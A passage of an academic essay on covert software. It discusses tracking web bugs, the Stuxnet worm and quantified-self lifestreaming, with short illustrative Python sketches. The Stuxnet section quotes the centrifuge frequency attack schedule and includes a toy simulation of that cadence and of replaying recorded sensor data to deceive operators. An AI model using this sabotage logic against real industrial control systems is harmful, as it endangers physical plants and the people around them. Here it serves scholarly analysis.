As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do not track header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). See, though, the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?] &lt;br /&gt;
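&lt;br /&gt;
What honouring the flag would involve is technically trivial, which underlines that the obstacle is commercial rather than technical. A sketch, continuing the illustrative web-bug handler above: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Honouring 'do not track' is technically trivial: inspect the DNT &lt;br /&gt;
# header and decline to set a tracking cookie when it is '1'. &lt;br /&gt;
def should_track(headers): &lt;br /&gt;
    """Return False when the browser signals an opt-out via DNT: 1.""" &lt;br /&gt;
    return headers.get("DNT") != "1" &lt;br /&gt;
 &lt;br /&gt;
# Inside the earlier toy handler one would then write: &lt;br /&gt;
#     if should_track(self.headers): &lt;br /&gt;
#         self.send_header("Set-Cookie", f"uid={uid}; Max-Age=31536000") &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;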
&lt;br /&gt;
One of the newer web bugs under development, and perhaps indicative of the direction of travel, is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking system will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction, between the ability of these computational systems and surfaces to supply a commodity to the user and the need to raise income through the harvesting of data that is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and of the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device whilst giving the impression that the user remains fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found a host that met its ‘strike conditions’, that is, the location it was designed to attack, whereupon it activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet’, is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys, and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage itself, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general-purpose attack, but is designed to unload its digital warheads only under specific conditions and against a specific target. It is also remarkable in the way in which it disengages the interface – the screen the user sees – from the underlying logic and performance of the machine. &lt;br /&gt;
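&lt;br /&gt;
The mechanics described here can be made a little more concrete. What follows is a minimal illustrative sketch in Python – my own reconstruction for exposition, emphatically not Stuxnet’s actual code – of the 27-day attack cadence reported by Zetter (2011), together with the record-and-replay trick that keeps the operator display looking normal; all names and simplifications are mine. &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Illustrative sketch only, not Stuxnet's code: the attack cadence
# described by Zetter (2011) and the man-in-the-middle replay that
# hides it from the control room. All names are assumptions.

NOMINAL_HZ = 1064
OVERSPEED_HZ = 1410      # near the IR-1 rotor's mechanical limit
UNDERSPEED_HZ = 2
PERIOD_DAYS = 27

recorded = []            # sensor values captured during quiet periods

def drive_frequency(day):
    # every 27 days, alternate a brief overspeed and underspeed event
    if day % PERIOD_DAYS:
        return NOMINAL_HZ
    cycle = day // PERIOD_DAYS
    return OVERSPEED_HZ if cycle % 2 == 0 else UNDERSPEED_HZ

def operator_display(day, attacking):
    # replay previously recorded 'normal' data during an attack, so
    # that the infected system never appears to behave abnormally
    if attacking and recorded:
        return recorded[day % len(recorded)]
    return NOMINAL_HZ

for day in range(109):
    true_hz = drive_frequency(day)
    attacking = true_hz != NOMINAL_HZ
    if not attacking:
        recorded.append(true_hz)
    if attacking:
        print(day, 'true:', true_hz, 'shown:', operator_display(day, attacking))
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Run over 109 simulated days, the sketch produces excursions on days 0, 27, 54, 81 and 108, whilst the ‘operator display’ reports only nominal values throughout. &lt;br /&gt;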
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, given the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm suggest that at least thirty people would have been working on it simultaneously (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one exploiting vulnerabilities that are neither public nor known to the developer of the attacked system – in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) systems and PLCs (Programmable Logic Controllers), this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that gave away the physical identity of the location – indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage the control systems from the physical systems and provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead (417) manipulated valves in the centrifuge cascades and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Langner (2011) evocatively described this as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This involved a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers and data structures, in order to try to understand what it was doing (Langner, 2011). As part of this process a reference to ‘Myrtus’ was discovered, and the link made to ‘Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively’ (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.)]] &lt;br /&gt;
&lt;br /&gt;
*Iran - 52.2% &lt;br /&gt;
*Indonesia - 17.4% &lt;br /&gt;
*India - 11.3% &lt;br /&gt;
*Pakistan - 3.6% &lt;br /&gt;
*Uzbekistan - 2.6% &lt;br /&gt;
*Russia - 2.1% &lt;br /&gt;
*Kazakhstan - 1.3% &lt;br /&gt;
*Rest of World - 9.4% &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al., n.d.).'' &lt;br /&gt;
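&lt;br /&gt;
The close reading of the code described above typically begins with something much simpler than full disassembly: extracting the printable character strings from the binary, which is how telltale artefacts such as the ‘myrtus’ file path surface. The following Python fragment is a minimal sketch of that first step, in the spirit of the Unix ''strings'' utility; the file name and length threshold are my own assumptions. &lt;br /&gt;
&amp;lt;pre&amp;gt;
import string

# bytes we treat as potentially part of an embedded text string
PRINTABLE = set((string.ascii_letters + string.digits +
                 string.punctuation + ' ').encode('ascii'))

def extract_strings(data, min_len=6):
    # scan raw bytes for runs of printable ASCII, as the Unix
    # 'strings' utility does; analysts grep such runs for markers
    # like file paths, project names and timestamps
    run = bytearray()
    for byte in data + b'\x00':       # trailing sentinel flushes the last run
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) // min_len:       # true once the run reaches min_len bytes
            yield run.decode('ascii')
        run = bytearray()

# hypothetical usage (the file name is illustrative only):
# blob = open('mrxnet.sys', 'rb').read()
# hits = [s for s in extract_strings(blob) if 'myrtus' in s.lower()]
&amp;lt;/pre&amp;gt; &lt;br /&gt;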
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. Of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so to learn, in a very short time, techniques that took many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one aimed at collecting data on industrial control systems and structures – a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code, via computational devices, to covertly monitor, control and mediate – both positively and negatively – is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies, called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years alongside ‘real-time streams’ platforms like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online: although this information remains notionally private, it is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
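&lt;br /&gt;
The pattern described here – pooling many users’ readings once identities have been masked – can be illustrated with a small sketch. The following Python fragment is a toy illustration of ‘anonymise and aggregate’, with invented readings; real services use far more careful de-identification than a truncated hash. &lt;br /&gt;
&amp;lt;pre&amp;gt;
import hashlib
from collections import defaultdict

# invented per-user readings, e.g. units of alcohol logged by an app
readings = [('alice', 2.1), ('bob', 3.4), ('alice', 1.8), ('bob', 2.9)]

def pseudonym(user_id):
    # replace the identity with a one-way hash before pooling
    return hashlib.sha256(user_id.encode()).hexdigest()[:8]

pooled = defaultdict(list)
for user, value in readings:
    pooled[pseudonym(user)].append(value)

# aggregate statistics can now be computed without raw identities
averages = {who: sum(vals) / len(vals) for who, vals in pooled.items()}
print(averages)
&amp;lt;/pre&amp;gt; &lt;br /&gt;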
&amp;lt;br&amp;gt; Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter’s text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, beginning with his email archive in 1989: ‘So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them’ (Wolfram, 2012). &lt;br /&gt;
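&lt;br /&gt;
Freeman’s description is concrete enough to sketch. The following Python fragment is a minimal illustration of a time-ordered stream of documents with one of the operators he mentions – the filtered ‘substream’; the class and method names are my own, not those of the Lifestreams system itself. &lt;br /&gt;
&amp;lt;pre&amp;gt;
import time
from dataclasses import dataclass, field

@dataclass
class Document:
    created: float                 # seconds since the epoch
    kind: str                      # 'mail', 'photo', 'reminder', ...
    body: str

@dataclass
class Lifestream:
    # a time-ordered stream of documents, oldest at the tail
    docs: list = field(default_factory=list)

    def store(self, kind, body, created=None):
        stamp = time.time() if created is None else created
        self.docs.append(Document(stamp, kind, body))
        self.docs.sort(key=lambda d: d.created)

    def substream(self, predicate):
        # 'organize information on demand': a filtered, still
        # time-ordered view of the stream
        view = Lifestream()
        view.docs = [d for d in self.docs if predicate(d)]
        return view

stream = Lifestream()
stream.store('mail', 'hello from the past', created=0.0)
stream.store('reminder', 'submit chapter draft')
mail_only = stream.substream(lambda d: d.kind == 'mail')
&amp;lt;/pre&amp;gt; &lt;br /&gt;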
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent, and in the context of reflexivity and self-knowledge it raises interesting questions. The scale of the data collected can be relatively large, and the data itself unstructured. Nonetheless, better data management, and techniques for searching and surfacing information from unstructured or semi-structured data, will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile ‘apps’ – small, relatively contained applications that usually perform a single specific function – have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check profiles and streams, and so on. When created as apps, however, they are also able to use the power of the local device – especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones – to log GPS location, direction, etc. This is where life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
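&lt;br /&gt;
In the JSON serialization specified by the working group, such an activity is a small structured object. The following Python fragment sketches one along the lines of the actor/verb/object/target model quoted above; the identifiers and URL are illustrative rather than taken from the specification. &lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# 'Geraldine posted a photo to her album', expressed as an activity
activity = {
    'published': '2011-02-10T15:04:55Z',
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo',
               'url': 'http://example.org/photos/1234'},
    'target': {'objectType': 'photo-album',
               'displayName': 'Geraldine\'s photo album'},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;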
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques, such as heat-maps and graph theory, that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case – in other words, for the individual user (or lifestreamer) as much as for the organization (such as Facebook) – the key is to pattern-match and compare details of the data, for example against a norm, a historical data set, or a population, group or class of others.[13] &lt;br /&gt;
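&lt;br /&gt;
As a toy illustration of what such pattern-matching against a norm might look like computationally, the following Python fragment compares one user’s invented daily step counts with a reference population; the measure (a z-score) and the two-standard-deviation threshold are my own choices. &lt;br /&gt;
&amp;lt;pre&amp;gt;
from statistics import mean, stdev

# invented data: a reference population's daily step counts and one
# user's week of readings
population = [6200, 7400, 5800, 9100, 6800, 7000, 6400]
user_week = [2100, 7400, 2200, 7000, 2300, 6900, 2000]

mu, sigma = mean(population), stdev(population)

def z_score(value):
    # distance from the population norm, in standard deviations
    return (value - mu) / sigma

flagged = [day for day, steps in enumerate(user_week)
           if abs(z_score(steps)) // 2]   # true at two or more s.d. out
print('days deviating from the norm:', flagged)
&amp;lt;/pre&amp;gt; &lt;br /&gt;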
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, through a stabilisation and web of meaning, for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
A thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation – and indeed very productive knowledge can be generated from this kind of research – it seems to me that we need to attend to the computationality represented in code and software if we are to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems – carrying USB sticks, logging into email accounts and distant networks – create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real time whilst secreting themselves within our computer systems, raises important questions. At the same time, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams – albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want particularly to draw attention to this passive-aggressive feature of computational agents that collect information: they are passive – under the surface, relatively benign and silent – yet aggressive in their hoarding of data, monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the ‘cloud’ – server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems, made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the ‘future self’ will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard – what has been described as ‘future self continuity’ (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. The past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are therefore often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy; the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences, and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
